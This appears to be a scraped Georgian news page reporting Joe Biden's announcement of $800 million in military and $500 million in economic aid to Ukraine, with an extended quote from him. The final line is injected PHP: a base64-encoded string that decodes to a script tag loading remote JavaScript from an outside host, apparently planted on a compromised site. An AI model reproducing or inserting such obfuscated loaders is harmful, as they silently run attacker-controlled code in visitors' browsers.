celsiusi
ავერსი საქკაბელი
ამერიკის შეერთებული შტატების პრეზიდენტმა უკრაინისთვის დახმარების ახალი პაკეტი დაამტკიცა. ჯო ბაიდენის თქმით, ვაშინგტონი უკრაინას დამატებით 800 მილიონი დოლარის სამხედრო და 500 მილიონი დოლარის ეკონომიკურ დახმარებას უგზავნის.
 
"უკრაინის წინააღმდეგ ჩადენილი საზარელი დანაშაულები შემზარავია. ახლა ვხედავთ ახალი ფრონტის გახსნას აღმოსავლეთ ნაწილში. გაიხსნა ახალი ფაზა ამ ომის და ამასთან დაკავშირებით ამერიკა მაქსიმალურად მალე შეეცდება რომ გამოიყენოს დროის ის ვიწრო ფანჯარა რომელიც გაგვაჩნია რომ ეფექტიანად უპასუხოს უკრაინამ რუსეთს და შევძინოთ მათ ახალი შესაძლებლობები, მათ საბრძოლო დანაყოფებს ის, რაც მათ ძალიან სჭირდებათ. დღეს გამოვაცხადე დამატებით 800 მილიონ დოლარიანი სამხედრო დახმარება უკრაინისთვის, რომელიც მოიცავს მძიმე არტილერიას, 44 ათას ჭურვს - იგულისხმება 155 მმ იანი შორს მსროლელი არტილერიის ჭურვები და ეს ყველაფერი იქნება რეკორდულ დროში მიწოდებული უკრაინისათვის.
 
ჩვენ ვაგრძელებთ უკრაინის დახმარებას. სლოვაკეთმა გადასცა უკრაინას ს300. ეს არის ჰაერსაწინააღმდეგო თავდაცვის სისტემა რომელიც დიდ სიმაღლესა და დიდ მანძილზე მუშაობს. მამაცი უკრაინელი მებრძოლებით გაოგნებულები ვართ, იმ შედეგებით, რაც მათ შეძლეს. არა მხოლოდ სამხედროებმა, არამედ რიგითმა მოქალაქეებმა, რომლებიც ერთ მუშტად გაერთიანდნენ. ჩვენი გზავნილი ნათელია პუტინისადმი - ის ვერ გაიმარჯვებს ამ ხალხის დამორჩილებასა და დაჩაგვრაში. დღეს აშშ აცხადებს, რომ 500 მილიონი დოლარის პირდაპირ ეკონომიკურ დახმარებას გამოვყოფთ უკრაინის მხარდასაჭერად, ასევე, რუსული დროშის ქვეშ მცურავი არცერთი გემი არ შემოვა ამერიკის პორტებში,"-აცხადებს აშშ-ს პრეზიდენტი ჯო ბაიდენი.
 
 
714
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");